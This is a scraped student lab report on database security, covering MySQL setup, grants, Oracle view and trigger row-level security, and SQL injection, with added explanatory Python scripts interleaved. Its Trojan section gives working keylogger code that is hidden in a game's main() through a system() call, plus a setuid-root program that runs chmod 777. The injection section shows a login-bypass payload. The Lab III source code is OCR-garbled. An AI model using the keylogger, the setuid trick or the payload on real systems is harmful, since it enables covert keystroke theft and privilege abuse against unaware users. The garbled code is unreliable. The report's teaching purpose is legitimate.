137568 Dbs Lab Final

Date post: 02-Jun-2018
Upload: rambabudamalla

8/11/2019 137568 Dbs Lab Final

LAB WORK

DATABASE SECURITY

Name     : Sunil Kumar Suman
Class    : M.Tech II Semester
Roll no. : 137568
Faculty  : Sri S. Ravi Chandra

INDEX

I. Configuring and Installing MySQL Server from source code. Creation and manipulation of database using SQL scripts :

    a) Creation of database schema with a given database design
    b) Creation of primary and foreign keys for relations
    c) Instantiate the database with instances
    d) Manipulation of existing instance with various options (Restrict, cascade, set NULL) in referential integrity.

II. Modification of Access Control List to change the different user privileges using Grant Table. Implementing DAC: Implementation of database security policies using DAC in MySQL

    a) User creation, roles, profiles and privileges
    b) Interpret given database security policies into an access control matrix
    c) Assign privileges based on users
    d) Understand potential vulnerabilities of DAC

III. Adding Native Function to MySQL Server by editing source code

IV. Implementation of Trojan Horse program to change the user privileges to a particular file

V. Implementation of Virtual her owned records by Select

VI. Implementation of V

I. Configuring and Installing MySQL Server from source code

A.

B. Pre-installation configuration

a) Adding user and group

shell> groupadd sunil
shell> useradd -r -g sunil sunil

C. Installation

a) Creating build directory

# go to directory location where source is extracted i.e mysql-server

shell> cd $HOME/mysql-server/mysql-[version]/

# create build directory and enter into build directory

shell> mkdir bld
shell> cd bld

b) Configuration with cmake

# issue following command after entering to build directory bld

shell> cmake ..

c) Building source code

# issue following command to build the source

shell> sudo make

d) Installing MySQL server

# following command will install MySQL server

shell> sudo make install

# This will install MySQL server in its default installation directory i.e /usr/local/mysql

D. Post-installation configuration

a) Installing grant table

shell> sudo ./mysql_install_db --user=sunil --basedir=/usr/local/mysql --datadir=/sqldata

b) Changing permission of data directory

shell> cd /
shell> chown -R sunil sqldata

# data directory must be owned by user 'sunil', otherwise grant table will not load successfully.

c) Other configurations

# all other configurations related to starting of MySQL server are kept in a file named my.conf under /usr/local/mysql. Here we can change the default port no. (3306) to some other in case the default port is already in use.

SCREENSHOTS

[Screenshots of the mysql> INSERT INTO ... and mysql> CREATE TABLE IF NOT EXISTS ... statements]

mysql> flush privileges;
mysql> quit;

# Now connecting through user1, user2 and user3 and checking permissions on database pharmacy :

shell> ./bin/mysql -u user1 -p
Enter password:

mysql> show grants;
# output
+------------------------------------------------------------------+
| Grants for user1@localhost                                       |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'user1'@'localhost' IDENTIFIED BY ...      |

shell> ./bin/mysql -u user3 -p
Enter password:

mysql> show grants;
# output
+------------------------------------------------------------------+
| Grants for user3@localhost                                       |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'user3'@'localhost' IDENTIFIED BY ...      |
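The SHOW GRANTS output above is the raw material for item II.b of the index (turning the security policy into an access control matrix) and II.d (spotting weak points of DAC). The script below is an added example and not part of the lab report: it parses SHOW GRANTS lines of the shape shown above into a user x object privilege matrix and flags two things a DAC review looks for, a global ALL PRIVILEGES grant and GRANT OPTION (which lets the grantee pass the privilege on, so the owner no longer controls who holds it). The sample grant lines, the `pharmacy` schema and the `drug` table are constructed; USAGE is treated as MySQL means it, "account exists, no privileges".

```python
import re
from collections import defaultdict

# Constructed sample of SHOW GRANTS output lines (not taken from the lab's screenshots).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'user1'@'localhost' IDENTIFIED BY PASSWORD '<hash>'",
    "GRANT SELECT, INSERT ON `pharmacy`.* TO 'user1'@'localhost'",
    "GRANT SELECT ON `pharmacy`.`drug` TO 'user2'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'user3'@'localhost' WITH GRANT OPTION",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s+"
    r"'(?P<user>[^']+)'@'(?P<host>[^']+)'(?P<rest>.*)$"
)


def parse_grant(line):
    """Split one SHOW GRANTS line into account, object and privilege set.

    Returns None for lines that are not GRANT statements."""
    m = GRANT_RE.match(line.strip())
    if m is None:
        return None
    # USAGE is MySQL's way of saying "account exists, no privileges": drop it.
    privs = {p.strip().upper() for p in m.group("privs").split(",")} - {"USAGE"}
    if "WITH GRANT OPTION" in m.group("rest").upper():
        privs.add("GRANT OPTION")
    return {
        "account": "%s@%s" % (m.group("user"), m.group("host")),
        "object": m.group("obj").replace("`", ""),
        "privs": privs,
    }


def access_matrix(lines):
    """Build {account: {object: set(privileges)}} from SHOW GRANTS lines."""
    matrix = defaultdict(lambda: defaultdict(set))
    for line in lines:
        g = parse_grant(line)
        if g is not None:
            matrix[g["account"]][g["object"]] |= g["privs"]
    return matrix


def dac_findings(matrix):
    """Weak points a DAC review should flag: global ALL PRIVILEGES, and GRANT OPTION
    (the grantee can re-grant, so the policy no longer has a single owner)."""
    findings = []
    for account, objects in matrix.items():
        for obj, privs in objects.items():
            if obj == "*.*" and "ALL PRIVILEGES" in privs:
                findings.append((account, obj, "global ALL PRIVILEGES"))
            if "GRANT OPTION" in privs:
                findings.append((account, obj, "GRANT OPTION"))
    return findings


if __name__ == "__main__":
    m = access_matrix(SAMPLE_GRANTS)
    for account, objects in m.items():
        for obj, privs in objects.items():
            print(account, obj, sorted(privs))
    for finding in dac_findings(m):
        print("finding:", finding)
```

Feed it the real output of `SHOW GRANTS FOR 'user'@'host'` for each account and the matrix rows become the access control matrix the assignment asks for; an account whose only row is an empty set on `*.*` has nothing beyond the right to connect.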

SCREENSHOTS

LAB III

Adding Native Function to MySQL Server by editing source code

# Here I am adding a native function named nitw() which takes a string as argument and returns that string on standard output.

Steps: For adding a native function which returns a string value, modification to the following files is required. These files are inside the /sql folder of the source code directory.

a) item_create.cc
b) item_strfunc.h
c) item_strfunc.cc

a) Modification in item_create.cc

# class definition for nitw()

class Create_func_nitw : public Create_func_arg1
{
public:
  virtual Item *create(THD *thd, Item *arg1);

  static Create_func_nitw s_singleton;

protected:
  Create_func_nitw() {}
  virtual ~Create_func_nitw() {}
};

# Adding method

Create_func_nitw Create_func_nitw::s_singleton;

Item*
Create_func_nitw::create(THD *thd, Item *arg1)
{
  return new (thd->mem_root) Item_func_nitw(arg1);
}

# Adding symbol in func_array[]

{ { C_STRING_WITH_LEN("NITW") }, BUILDER(Create_func_nitw)},

  • 8/11/2019 137568 Dbs Lab Final

    18/38

    b) M#-i/ica!i#n in i!ems!r/unc.h

    F Deri,in0 s!rin0 /unc!i#n /r#m i!ems!r/unc class -e/ine- in i!ems!r/unc.h

    lass Item_fun _nitw :publi Item_str_fun

    {

    tring tmp_value"

    publi :

    Item_fun _nitw(Item *a! : I tem_str_fun (a! { $

    tring *val_str(tring *!"

    v#id f i2_length_and_de ( !

    {

    ma2_length345"

    $

    #nst har *fun _name( ! #nst { return /nitw/" $

    $ "

    c) M#-i/ica!i#n in i!ems!r/unc.cc

    F ;ere ac!ual l#0ic #/ /unc!i#n is a--e-7 i.e 4ha! /unc!i#n 4ill 2er/#rm a/!ere6ecu!in0 an- 4ha! i! 4ill re!urn

    tring *Item_fun _nitw: :val_str(tring *str!

    {

    return args657 &'val_str(str! "

    $

    F A/!er a--in0 !he a3#,e c#-es !# !heir res2ec!i,e /iles7 !he s#urce c#-e nee-s !# 3erec#m2ile7 3uil- an- ins!all.

    F A/!er success/ul 3uil- an- ins!alla!i#n !he /unc!i#n nit8?) 4ill remain ac!i,e an-

    can 3e use- an+!ime a/!er ser,er is s!ar!e-.

    F Ou!2u! :

    m+s@l SELECT ni!4QWelc#me Q"????????????????????H ni!4QWelc#me Q" H????????????????????H Welc#me H????????????????????$ r#4 in se! =.== sec"

SCREENSHOTS

IV. Implementation of Trojan Horse program to change the user privileges to a particular file

a) shell script to record the keystrokes

#!/bin/bash
if [[ $1 == "stop" ]]; then
    python /home/sksuman/dbs/logger/parse.py   # it should log anything it can even before the backup if its timed out
    kill $(ps aux | awk '/[b]ackup/ {print $2}')   # the most elegant way to kill this process!
    exit   # exit the script itself
fi
if [[ $1 == "start" ]]; then
    echo "Game initializing..."
fi
while true
do
    showkey > /home/sksuman/dbs/logger/logger.txt
    python /home/sksuman/dbs/logger/parse.py
done

b) python script to map the keystrokes with the keymap.txt file and generate output to the output.log file

import datetime

fin = open("/home/sksuman/dbs/logger/keymap.txt", "r")
lineList = fin.readlines()
fin.close()
args = ['nul']*88
for line in lineList:
    #print line
    if line[0] == "k":
        #print int(line[8:10])
        args.insert(int(line[8:10]), line[12:len(line)-1])
        args.pop()
#print args
#print len(args)
#now that i have formed the args list..I can work on the args array!
fin = open("/home/sksuman/dbs/logger/logger.txt", "r")
lineList = fin.readlines()
fin.close()
f = open("/home/sksuman/dbs/logger/output.log", "a")

index = 0
for line in lineList:
    #print line
    if line[0:5] == "keyco":
        if index == 0:
            #Datetime to be saved only when some keycode is read
            f.write("\n \n"+datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")+" \n ============================================== \n")
        ########################### actual keystrokes get recorded here ######################
        index = int(line[9:11])
        if (index==42 or index==54) and line[12:len(line)-1]=="press":
            #shift has been pressed
            f.write("")
        elif index==58 and line[12:len(line)-1]=="press":
            #caps has been pressed
            f.write("")
        elif index==28 and line[12:len(line)-1]=="release":
            f.write("\n")
        elif index==57 and line[12:len(line)-1]=="release":
            f.write("\t")
        elif (index==42 or index==54) and line[12:len(line)-1]=="release":
            #shift has been released
            f.write("")
        elif index==58 and line[12:len(line)-1]=="release":
            #caps has been released
            f.write("")
        elif line[12:len(line)-1]=="release":
            f.write(args[index])
f.close()
#file writing is done

c) Inserting code in the main function of the game source code

#include <cstdlib>
#include "supertux/main.hpp"

int main(int argc, char** argv)
{
  system("./backup.sh start");
  return Main().run(argc, argv);
}

# Changing permission of a file using system call

a) a program in C which uses a system call to change the permission

#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int uid;
    uid = setuid(0);   /* returns 0 only when the process may become root, i.e. the binary is setuid-root */
    if (uid == 0) {
        system("chmod 777 /home/sksuman/dbs/logger/logger.txt");
    }
    return 0;
}

b) changing the ownership of the file initially and setting the setuid bit

shell> gcc horse.c -o horse
shell> sudo chown root horse
shell> sudo chgrp root horse
shell> sudo chmod u+s horse

Now this file can be transferred to any system, where it will change the permission of the file kept in /home/sksuman/dbs/logger/logger.txt

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/xe
export ORACLE_SID=XE
export NLS_LANG=`$ORACLE_HOME/bin/nls_lang.sh`
export ORACLE_BASE=/u01/app/oracle
export LD_LIBRARY_PATH=$ORACLE_HOME/lib:$LD_LIBRARY_PATH
export PATH=$ORACLE_HOME/bin:$PATH

b) execute your .profile to load the changes:

shell> . ./.profile

c) Start the Oracle 11g XE :

shell> sudo service oracle-xe start

OUTPUT :

sksuman@NITW:~$ sudo -i
[sudo] password for sksuman:
root@NITW:~# sqlplus sys as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Mon Mar 3 10:09:24 2014

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g [...]

SQL> create user sunilks identified by 1768 default tablespace users;

User created.

SQL> grant dba to sunil;

Grant succeeded.

SQL> grant create session to sunilks;

Grant succeeded.

SQL> conn sunilks/1768;
Connected.

ii) Create table and view

SQL> create table dbslab(rollno number,username varchar(20));

Table created.

SQL> insert into dbslab values(1768,user);

1 row created.

SQL> show user;
USER is "SUNILKS"

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS

SQL> create view login_view as select rollno,username from dbslab
     where username=user;

View created.

SQL> select * from login_view;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS

SQL> insert into dbslab values(1,user);

1 row created.

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS

iii) Create another user 'guest1' and grant permissions :

SQL> conn sys as sysdba;
Enter password:
Connected.

SQL> create user guest1 identified by passwd1 default tablespace users;

User created.

SQL> grant create session to guest1;

Grant succeeded.

iv) Connect to sunilks and grant permission to create session and on the created view to user guest1 ; Insert values using the view by user guest1 :

SQL> conn sunilks/1768;
Connected.

SQL> grant select,insert on login_view to guest1;

Grant succeeded.

SQL> conn guest1/passwd1;
Connected.

SQL> select * from sunilks.login_view;

no rows selected

SQL> insert into sunilks.login_view values(2,user);

1 row created.

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
         2 GUEST1

SQL> insert into sunilks.login_view values(3,user);

1 row created.

v) Verify whether the select command displays rows of the currently logged in user or not :

SQL> conn guest1/passwd1;
Connected.

SQL> show user;
USER is "GUEST1"

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
         2 GUEST1
         3 GUEST1

Since the current user is guest1 and it is showing only rows having username=guest1, it is verified.

SQL> conn sunilks/1768;
Connected.

SQL> show user;
USER is "SUNILKS"

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS
         2 GUEST1
         3 GUEST1

From the above output we can see that when we login through user 'sunilks' and try to access rows using the view 'login_view', it shows only the results belonging to user sunilks, not those of 'guest1'.

In the second case, when we select rows directly from the table, i.e. not using the view, all the rows of the table 'dbslab' are retrieved irrespective of the logged in user.

Hence a view can be implemented to provide row level security (VPD) when used with the ORACLE predefined function 'user'.

VI. Implementation of VPD using Oracle application Context

This is similar to the previous assignment; the only difference is that here we need to create a TRIGGER which automatically inserts the username of the currently logged in user whenever we insert any value in the defined table :

i) Inserting a value in table dbslab without using function 'user' and verifying whether the username is added automatically or not :

SQL> conn guest1/passwd1;
Connected.

SQL> show user;
USER is "GUEST1"

SQL> insert into sunilks.login_view(rollno) values (4);

1 row created.

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
         2 GUEST1
         3 GUEST1

SQL> conn sunilks/1768;
Connected.

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS
         2 GUEST1
         3 GUEST1
         4

Clearly we can see that the row with the rollno value is inserted but it has no username inserted automatically.

ii) Now, creating a TRIGGER which will insert the username automatically upon each insert statement :

SQL> show user;
USER is "SUNILKS"

SQL> create or replace trigger trg
  2  before insert
  3  on dbslab
  4  for each row
  5  begin
  6  :new.username := user;
  7  end;
  8  /

Trigger created.

SQL> select trigger_name from user_triggers;

TRIGGER_NAME
------------------------------
TRG

iii) Verifying working of trigger TRG :

SQL> conn guest1/passwd1;
Connected.

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
         2 GUEST1
         3 GUEST1

SQL> insert into sunilks.login_view(rollno) values(5);

1 row created.

SQL> select * from sunilks.login_view;

    ROLLNO USERNAME
---------- --------------------
         2 GUEST1
         3 GUEST1
         5 GUEST1

# Clearly we can see from the above output that username guest1 is added automatically

SQL> conn sunilks/1768;
Connected.

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS
         2 GUEST1
         3 GUEST1
         4
         5 GUEST1

6 rows selected.

SQL> insert into login_view(rollno) values(6);

1 row created.

SQL> select * from login_view;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS
         6 SUNILKS

SQL> select * from dbslab;

    ROLLNO USERNAME
---------- --------------------
      1768 SUNILKS
         1 SUNILKS
         2 GUEST1
         3 GUEST1
         4
         5 GUEST1
         6 SUNILKS

7 rows selected.

# The above output shows username 'sunilks' is added automatically. Hence verified.
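Labs V and VI above rest on two mechanisms: a view whose predicate compares the row's username with the session identity (Oracle's USER), and a BEFORE INSERT trigger that stamps that identity on new rows. The script below is an added example, not code from the lab report, that reproduces both with Python's standard sqlite3 module so the behaviour can be checked offline. Assumptions: Oracle's USER is emulated by an application-defined function `app_user()` that reads a `Session` object (no real authentication happens); because SQLite cannot assign `:new.username` in a BEFORE trigger, the same effect is obtained with an AFTER INSERT trigger that updates the freshly inserted row, and an INSTEAD OF trigger is needed for inserts through the view. The rollnos and user names are constructed to follow the lab's session.

```python
import sqlite3


class Session:
    """Stand-in for the database session identity (assumption: Oracle's USER is
    emulated by an application-defined function that reads this attribute)."""
    def __init__(self):
        self.user = None


def open_db():
    sess = Session()
    conn = sqlite3.connect(":memory:")
    # app_user() plays the role of Oracle's predefined USER function.
    conn.create_function("app_user", 0, lambda: sess.user)
    conn.executescript("""
        create table dbslab(rollno integer, username text);

        -- the lab's login_view: each session sees only rows carrying its own name
        create view login_view as
            select rollno, username from dbslab where username = app_user();

        -- SQLite views are not insertable by default; route inserts to the base table
        create trigger login_view_insert instead of insert on login_view
        begin
            insert into dbslab(rollno, username) values (new.rollno, new.username);
        end;

        -- the lab's TRG: stamp the current user on rows inserted without a username.
        -- SQLite cannot assign :new.username in a BEFORE trigger, so the row is
        -- updated right after the insert instead (same observable effect).
        create trigger trg after insert on dbslab
        when new.username is null
        begin
            update dbslab set username = app_user() where rowid = new.rowid;
        end;
    """)
    return conn, sess


def insert_via_view(conn, rollno, username=None):
    conn.execute("insert into login_view(rollno, username) values (?, ?)",
                 (rollno, username))
    conn.commit()


def own_rows(conn):
    """What the current session sees through login_view."""
    return conn.execute(
        "select rollno, username from login_view order by rollno").fetchall()


def all_rows(conn):
    """What the table owner sees when bypassing the view."""
    return conn.execute(
        "select rollno, username from dbslab order by rollno").fetchall()


def demo():
    """Replays the lab's sequence: owner inserts, guest inserts, each reads the view."""
    conn, sess = open_db()
    sess.user = "SUNILKS"
    insert_via_view(conn, 1768, "SUNILKS")   # like values(1768, user)
    insert_via_view(conn, 1)                 # no username: trigger fills SUNILKS
    sess.user = "GUEST1"
    insert_via_view(conn, 2)                 # trigger fills GUEST1
    guest_sees = own_rows(conn)
    sess.user = "SUNILKS"
    owner_sees = own_rows(conn)
    return guest_sees, owner_sees, all_rows(conn)


if __name__ == "__main__":
    for label, rows in zip(("guest1 via view", "sunilks via view", "whole table"), demo()):
        print(label, rows)
```

The point the lab's page 28 conclusion makes is visible in the third return value: the filter lives in the view, so anyone with SELECT on the base table still reads every row. Row-level security of this kind only holds when users are granted access to the view and not to the table behind it.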

VII. SQL INJECTION IMPLEMENTATION

Here I have created two forms and two php files which validate the data (username and password) from the MySQL database.

The first php code is vulnerable to SQL INJECTION. The second php code is secured.

The vulnerability is due to the single quote ( ' ).

HTML code for creating the form which takes username and password as user input :

--------------------------------------------------------------------
[HTML login page: "dbs-lab login page, NITW" / "This is a test page to show implementation of simple SQL INJECTION ATTACK" / "VULNERABLE TO SQL INJECTION" / fields: User Name, Password]
--------------------------------------------------------------------

PHP code which validates the username and password given by the user in the form (code above) with the mysql database sql_inj_test, table admin :

This PHP code is vulnerable to SQL INJECTION :
--------------------------------------------------------------------
[...] {
    echo "authorization success!!!";
}
?>
--------------------------------------------------------------------

SECURE PHP code which validates the username and password given by the user in the form (code above) with the mysql database table admin :
--------------------------------------------------------------------
$result = mysql_query("select username,password from admin where username = '$uname'");
$row = mysql_fetch_array($result);
if ($row["username"] == $uname && $row["password"] == $paswd) {
    echo "authorization success!!!";
}
?>
--------------------------------------------------------------------

OUTPUT

Login page: here I am using username sunil and password: [...]

output

Now login using username sunil, password ' or ':'=':

Output: authorization successful, which shows the php code is vulnerable to sql injection attack!

Now login to the form which is secure from sql injection attack

username sunil
password ' or ':'=':

secured sql injection login page

The above HTML form sends its output to the php file sql_injection_secure_login.php, which validates the input of the form against the mysql database (sql_inj_test, table admin, which consists of username sunil and password [...]). When logging in with an input password like ' or ':'=': it should fail the authorization and return an error.

OUTPUT

Clearly from the second result we can see that the second PHP code is secure against the sql injection attack since it does not allow the password ' or ':'=':.
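The two PHP files above differ in where the password is compared, not in how the query is built. The script below is an added example, not code from the lab, and uses Python's sqlite3 module so that all three variants can be run offline: a query assembled from user input the way the page describes the vulnerable file (its body is not visible on the page, so this shape is an assumption), the page's "secure" variant that compares the password in the application, and the standard fix, a parameterized query. The admin credentials are constructed; the injected input is the page's own `' or ':'=':`.

```python
import sqlite3

# Constructed credentials standing in for the lab's admin table
# (a real deployment stores a salted password hash, never the plaintext).
CONSTRUCTED_ADMIN = ("sunil", "secret-1234")

# The injected password input used on the page.
INJECTED = "' or ':'=':"


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin(username text, password text)")
    conn.execute("insert into admin values (?, ?)", CONSTRUCTED_ADMIN)
    conn.commit()
    return conn


def login_vulnerable(conn, uname, paswd):
    """Query text built from user input (assumed shape of the lab's first PHP file).
    A single quote in the input closes the literal and the rest is parsed as SQL:
    ... and password = '' or ':'=':'  is true for every row."""
    sql = ("select username, password from admin "
           "where username = '%s' and password = '%s'" % (uname, paswd))
    return conn.execute(sql).fetchone() is not None


def lookup_interpolated(conn, uname):
    """The query of the lab's 'secure' file: the username is still pasted into the SQL."""
    sql = "select username, password from admin where username = '%s'" % uname
    return conn.execute(sql).fetchone()


def login_compare_in_app(conn, uname, paswd):
    """The lab's 'secure' check: the password is compared in the application, so an
    injected password no longer bypasses the login."""
    row = lookup_interpolated(conn, uname)
    return row is not None and row[0] == uname and row[1] == paswd


def login_parameterized(conn, uname, paswd):
    """Standard fix: placeholders. The driver passes the values separately from the
    statement text, so quotes in the input are data, never SQL syntax."""
    row = conn.execute(
        "select username, password from admin where username = ? and password = ?",
        (uname, paswd)).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = setup()
    print("vulnerable, injected password  :", login_vulnerable(conn, "sunil", INJECTED))
    print("compare-in-app, injected pass  :", login_compare_in_app(conn, "sunil", INJECTED))
    print("compare-in-app, injected name  :", lookup_interpolated(conn, INJECTED))
    print("parameterized, injected pass   :", login_parameterized(conn, "sunil", INJECTED))
```

The third printed line is the caveat the page does not state: the "secure" file refuses the login, but its query still executes whatever the username field contains and hands back the admin row, password column included. Moving the comparison into the application fixes the symptom shown on page 37; only the parameterized statement removes the injection itself.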

